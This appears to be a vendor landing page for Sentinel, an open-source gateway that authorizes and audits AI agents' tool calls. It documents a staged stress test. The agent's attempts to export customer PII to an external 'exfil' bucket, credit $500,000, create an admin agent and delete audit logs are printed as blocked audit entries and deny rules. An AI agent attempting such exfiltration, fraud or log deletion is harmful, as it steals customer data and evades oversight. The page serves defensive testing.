Open Source · Real Data · Reproducible

We Ran Every AI Agent Attack
We Could Think Of.
0 Breaches.

We deployed an AI agent authorization gateway in front of a financial services MCP server and ran an adversarial stress test: 6 tool calls, 4 attack classes, 55 milliseconds. Every request logged, every decision explained, every byte accounted for. Real data. Open source. Reproduce it yourself.

6
Tool Calls Intercepted
4
Attacks Blocked
< 1ms
Per-Decision Latency
0
Bytes Exfiltrated

Your AI Agents Have API Access. Who's Watching Them?

AI agents authenticate once and then make thousands of autonomous tool calls with no human reviewing individual actions. They operate at machine speed with human-level API access. Traditional IAM was built for users who click buttons and type passwords. It was not designed for autonomous software making 1,000 API calls per hour.

Machine-Speed Exfiltration

A compromised agent can export your entire customer database in seconds. By the time a human notices, the data is gone. Every record. Every field.

No Intent Enforcement

An agent authorized to "read customer data" can call write, delete, and export tools. RBAC controls what endpoints exist, not what an agent actually does with them.

No Forensic Trail

When an incident occurs, there's no structured log tying agent identity to tool call to arguments to authorization decision. You're reconstructing from access logs and prayer.

Compliance Blind Spot

SOC 2 requires access controls. PCI-DSS requires audit trails. HIPAA requires access logging. AI agents bypass every control designed for human users.

The Cost of Doing Nothing

This is not theoretical risk. These are the numbers from organizations that learned the hard way.

$4.88M
Avg. Breach Cost (IBM 2024)
292
Days to Identify + Contain
$5K-100K
PCI-DSS Fine / Month
4%
GDPR: % of Global Revenue

Those numbers assume human-speed breaches. An AI agent operating autonomously can exfiltrate more data in 60 seconds than a human attacker can in 60 days. The breach cost model hasn't caught up to machine-speed threats yet.

Without Agent IAM
  • All 6 tool calls reach the MCP server
  • $500K fraudulent balance modification succeeds
  • Customer PII (SSN, CC#) exfiltrated to external S3
  • Audit logs deleted, covering attacker's tracks
  • No structured trail tying agent to actions
  • Breach discovered days or weeks later
With Sentinel
  • Only 2 legitimate calls forwarded upstream
  • Balance modification blocked before transmission
  • PII fields automatically redacted in audit trail
  • Audit deletion blocked; full trail preserved
  • Every action logged with 12-field forensic detail
  • Every violation caught in real-time (< 1ms)

The Scenario: QuantumBank Risk Analysis

QuantumBank deploys AI agents to analyze customer transaction patterns and generate risk reports. Agent risk-analyzer-7 is registered with read and analyze capabilities, scoped to a task session with a 50-call budget and two whitelisted tools.

What this test is and isn't. This is an adversarial stress test of Sentinel's authorization boundary, not a simulation of a realistic attack. Real compromised agents are subtler — they don't attempt data exfiltration, balance modification, privilege escalation, and evidence destruction in sequence. We designed this scenario to test every enforcement layer in one session. The attacks are loud by design: they prove the floor holds. Subtle attacks — like prompt injection that produces legitimate-looking tool calls, or slow exfiltration through authorized read operations — are a different threat class that requires additional layers beyond session whitelisting.

QuantumBank AI Infrastructure Agent: risk-analyzer-7 Sentinel Gateway MCP Server (claude-opus-4-6) (:8080) (QuantumBank API) | | | |── tools/call ────────────────>| | | |── OAuth validate | | |── MCP parse (tool + args) | | |── Session check (budget/TTL) | | |── Policy evaluate | | |── Behavior detect | | |── Audit log (w/ redaction) | | | | | ALLOW?──── |── forward ──────────────────>| |<────────────────── response ──|<─────────────────────────────| | | | | DENY? ──── |── 403 + reason | |<────────────────── blocked ───| (never reaches upstream) |
Agent Registration POST /agents
{ "owner": "user:quantumbank-risk-team", "model": "claude-opus-4-6", "capabilities": ["read", "analyze"], "trust_level": "basic" } // Response: { "agent_id": "8b6f1275-7271-440f-ba1c-b9aa50fc0783", "token": "eyJ0eXAiOiJKV1Qi..." }
Task Session POST /sessions
{ "agent_id": "8b6f1275-7271-440f-ba1c-b9aa50fc0783", "declared_intent": "analyze customer transaction patterns", "authorized_tools": ["query_transactions", "generate_risk_report"], "time_limit_secs": 1800, "call_budget": 50 } // The agent can ONLY call query_transactions and generate_risk_report. // Everything else is denied before it reaches the upstream server.

55 Milliseconds. 6 Tool Calls. The Full Story.

At 17:44:12 UTC on March 10, 2026, agent risk-analyzer-7 began its task session. The first two calls were legitimate. Then it attempted four unauthorized operations in rapid succession — data exfiltration, balance manipulation, privilege escalation, and audit destruction. Each one was blocked before a single byte reached the upstream server. These are the results.

17:44:12.010Z Allowed < 1ms
query_transactions

Queried transaction history for account ACT-7291, date range 2026-01-01 to 2026-03-10. Legitimate read operation matching declared intent. Forwarded to upstream.

17:44:12.023Z Allowed < 1ms
generate_risk_report

Generated VaR-95 risk report for portfolio PRTF-3847. Analytical operation consistent with agent's declared capabilities. Forwarded to upstream.

17:44:12.034Z Denied < 1ms
export_customer_data

Attempted to export SSN, credit card numbers, and DOB for customer CUST-19283 to s3://external-bucket/exfil/. Tool not in session whitelist. Blocked before a single byte reached upstream.

17:44:12.045Z Denied < 1ms
modify_account_balance

Attempted to credit $500,000 to account ACT-7291. Tool not in session whitelist. Write operation in read-only session. Blocked. Zero bytes transmitted to upstream.

17:44:12.055Z Denied < 1ms
create_admin_agent

Attempted privilege escalation: register a new agent with admin trust level and full read/write/delete/admin capabilities. Deny-by-default. No policy match. Delegation scope would prevent this even with one.

17:44:12.066Z Denied < 1ms
delete_audit_logs

Final move: delete all audit logs from 2026-01-01 to present, disguised as "storage optimization." Tool not whitelisted. Delete operation in read session. Blocked. The audit trail that recorded this attempt is itself protected from deletion.

The Raw Audit Trail

Every tool call produces a structured JSONL entry with agent identity, session scope, tool name, full arguments, authorization decision, matched policy, anomaly flags, and latency. This is not a summary. This is the actual data.

audit.jsonl Entry #3 — Blocked Exfiltration Attempt
{ "timestamp": "2026-03-10T17:44:12.034011Z", "request_id": "f7fd4108-b3ff-4514-aff3-8b138ee76eb9", "agent_id": "8b6f1275-7271-440f-ba1c-b9aa50fc0783", "delegation_chain": "user:quantumbank-risk-team>8b6f1275...", "task_session_id": "ce4579a8-0f6d-4677-93d8-7aeee9f01fc1", "tool_called": "export_customer_data (tools/call)", "arguments": { "customer_id": "CUST-19283", "fields": ["name", "ssn", "account_number", "credit_card", "dob", "address"], "format": "csv", "destination": "s3://external-bucket/exfil/" }, "authorization_decision": "deny", "policy_matched": "session-whitelist: tool not authorized", "anomaly_flags": [], "latency_ms": 0, "upstream_status": 403 // Blocked — never reached upstream }
audit.jsonl Entry #4 — Blocked $500K Account Manipulation
{ "timestamp": "2026-03-10T17:44:12.045050Z", "request_id": "555527b4-0c45-4af7-a707-12bd9e86505f", "agent_id": "8b6f1275-7271-440f-ba1c-b9aa50fc0783", "delegation_chain": "user:quantumbank-risk-team>8b6f1275...", "task_session_id": "ce4579a8-0f6d-4677-93d8-7aeee9f01fc1", "tool_called": "modify_account_balance (tools/call)", "arguments": { "account_id": "ACT-7291", "amount": 500000.00, "reason": "adjustment" }, "authorization_decision": "deny", "policy_matched": "session-whitelist: tool not authorized", "anomaly_flags": [], "latency_ms": 0, "upstream_status": 403 // Blocked — never reached upstream }
audit.jsonl Entry #6 — Blocked Audit Tampering
{ "timestamp": "2026-03-10T17:44:12.066312Z", "request_id": "639b54aa-f8ba-4d6f-afa6-4358302ae615", "agent_id": "8b6f1275-7271-440f-ba1c-b9aa50fc0783", "delegation_chain": "user:quantumbank-risk-team>8b6f1275...", "task_session_id": "ce4579a8-0f6d-4677-93d8-7aeee9f01fc1", "tool_called": "delete_audit_logs (tools/call)", "arguments": { "date_range": "2026-01-01/2026-03-10", "reason": "storage optimization" }, "authorization_decision": "deny", "policy_matched": "session-whitelist: tool not authorized", "anomaly_flags": [], "latency_ms": 0, "upstream_status": 403 // Blocked — never reached upstream }

Prometheus Metrics from This Scenario

Sentinel exports production-grade Prometheus metrics on every request. These numbers come directly from the /metrics endpoint captured during this scenario. Plug into Grafana, Datadog, or any Prometheus-compatible monitoring.

GET /metrics Prometheus scrape
# HELP requests_total Total requests by authorization decision # TYPE requests_total counter requests_total{decision="allow"} 2 requests_total{decision="deny"} 4 # HELP tool_calls_total Total tool calls by tool name # TYPE tool_calls_total counter tool_calls_total{tool="query_transactions"} 1 tool_calls_total{tool="generate_risk_report"} 1 tool_calls_total{tool="export_customer_data"} 1 tool_calls_total{tool="modify_account_balance"} 1 tool_calls_total{tool="create_admin_agent"} 1 tool_calls_total{tool="delete_audit_logs"} 1 # HELP anomalies_total Total anomalies detected # TYPE anomalies_total counter anomalies_total 0 # HELP request_duration_seconds End-to-end request duration # TYPE request_duration_seconds histogram request_duration_seconds_bucket{le="0.005"} 6 // All 6 under 5ms request_duration_seconds_sum 0.001 request_duration_seconds_count 6

How It Works: 9 Stages, Every Request

Sentinel sits between your AI agents and your MCP server. Every tool call passes through 9 inspection stages. Each stage can independently reject a request, but every stage always writes to audit. Average overhead: < 1ms per request.

Don't Trust Us. Verify.

Every data point on this page came from a reproducible scenario. Here are the exact commands. Run them yourself. Read the source code. If you find a way through that Sentinel doesn't catch, open an issue.

terminal Reproduce the QuantumBank scenario
# Clone and build (requires Rust toolchain) git clone https://github.com/ireland-samantha/sentinel.git cd sentinel cargo build --release # Start the mock MCP upstream (echo server) python3 docker/echo-server.py & # Start Sentinel with the QuantumBank scenario config ./target/release/sentinel --config docker/scenario-quantumbank.toml & sleep 1 && curl -sf http://localhost:8080/health && echo "Sentinel ready" # Run all 6 tool calls — 2 allowed, 4 blocked ./docker/run-scenario.sh # Read the audit trail yourself cat /tmp/sentinel-scenario-audit.jsonl | jq . # Check the metrics curl http://localhost:8080/metrics # Run the full test suite cargo test --workspace
scenario-quantumbank.toml The policy configuration
# This is the actual config used in this scenario. # Two tools are allowed. Everything else is denied by default. [[policy.policies]] id = "allow-risk-read-tools" effect = "allow" allowed_tools = ["query_transactions", "generate_risk_report"] [policy.policies.intent_match] keywords = ["analyze"] [[policy.policies]] id = "deny-data-export" effect = "deny" allowed_tools = ["export_customer_data"] [[policy.policies]] id = "deny-financial-modification" effect = "deny" allowed_tools = ["modify_account_balance"] [[policy.policies]] id = "deny-privilege-escalation" effect = "deny" allowed_tools = ["create_admin_agent"] [[policy.policies]] id = "deny-audit-tampering" effect = "deny" allowed_tools = ["delete_audit_logs"]

Source code: handler.rs (middleware chain) · eval.rs (policy engine) · integration.rs (test suite)

What Sentinel Is Not

Honesty about scope is more useful than marketing about potential. Here's what Sentinel does and doesn't do.

Not a WAF

Sentinel doesn't inspect HTTP payloads for SQL injection or XSS. It operates at the MCP tool-call layer, not the HTTP layer.

Not a DLP System

Sentinel blocks unauthorized tool calls before they execute. It doesn't scan outbound data for PII patterns. The redaction is for audit entries, not traffic.

Not a Network Firewall

Sentinel is an application-layer gateway for AI agent tool calls. Network security, TLS termination, and rate limiting are complementary infrastructure.

Not Magic

Sentinel enforces policies you write. The quality of protection is bounded by the quality of your policy configuration. It gives you the enforcement engine; you provide the rules.

What This Demo Doesn't Show

The QuantumBank scenario tests authorization boundary enforcement: can an agent call tools it wasn't authorized to use? That's the foundation. But it's not the whole picture. Attack classes this demo does not cover:

Session whitelisting catches the loud attacks. Behavioral anomaly detection (stage 8) and parameter-level policy constraints help with the subtle ones. Defense in depth means no single layer is the whole answer.

Protocol Scope

Today: MCP protocol (JSON-RPC 2.0) over HTTP. Sentinel parses tools/call, tools/list, and resources/read methods. MCP is where we started because it's the emerging standard for AI agent tool use and has the richest structured data to enforce on. Non-MCP traffic can be passed through or rejected depending on configuration.

The Industry Knows This Problem Exists

"AI agents represent a fundamentally new identity type that existing IAM frameworks were not designed to handle. Organizations need purpose-built controls for non-human autonomous actors."
ISACA, "Managing AI Agent Risk" (2025)
"The rise of AI agents creates novel security challenges: machine-speed operations, autonomous decision-making, and opaque reasoning all demand new approaches to access control and auditability."
Cloud Security Alliance, "AI Agent Security Framework" (2025)
"Traditional RBAC cannot express intent boundaries. An agent with 'read' permission can still call write endpoints unless the control plane enforces operation-type awareness."
OpenID Foundation, "Non-Human Identity Working Group" (2025)

Why This Matters Now

Anthropic, OpenAI, Google, and Microsoft all shipped agent frameworks in 2024-2025. The MCP protocol is becoming the standard interface for AI agent tool use. Enterprises are deploying autonomous agents into production workflows: code generation, customer service, data analysis, financial operations.

Every one of these deployments needs an authorization layer between "the agent has API access" and "the agent can do anything with that access." Today, almost none of them have one. The gap between AI agent deployment velocity and AI agent security infrastructure is the largest unaddressed risk surface in enterprise software.

Sentinel is purpose-built for this gap: a protocol-aware authorization gateway that understands what AI agents are doing at the tool-call level, not just the network level. Open source. Single binary. Deploys in minutes, not months.

Deploy in 5 Minutes

Sentinel is a single Rust binary. No agents to install, no sidecars, no service mesh. Put it in front of your MCP server. Every tool call is now secured, logged, and auditable.

terminal 3 commands to production
# 1. Install (Linux and macOS, amd64 and arm64) OS=$(uname -s | tr '[:upper:]' '[:lower:]' | sed 's/darwin/macos/') \ ARCH=$(uname -m | sed 's/x86_64/amd64/') && \ curl -fsSL "https://github.com/ireland-samantha/sentinel/releases/latest/download/sentinel-${OS}-${ARCH}" \ -o /usr/local/bin/sentinel && chmod +x /usr/local/bin/sentinel # 2. Configure cat > sentinel.toml <<'EOF' [proxy] upstream_url = "http://your-mcp-server:8081" [audit] enabled = true file_path = "/var/log/sentinel/audit.jsonl" redaction_patterns = ["password", "ssn", "credit_card"] [admin] api_key = "your-secure-key" EOF # 3. Run sentinel --config sentinel.toml INFO proxy listening proxy_addr=0.0.0.0:8080 INFO admin API listening admin_addr=0.0.0.0:3000

Your AI Agents Are Making Tool Calls Right Now.
Can You See What They're Doing?

Open source. Apache 2.0. No vendor lock-in. Deploy in 5 minutes. See every tool call, every argument, every decision.

Enterprise support and custom policy development available. Contact us.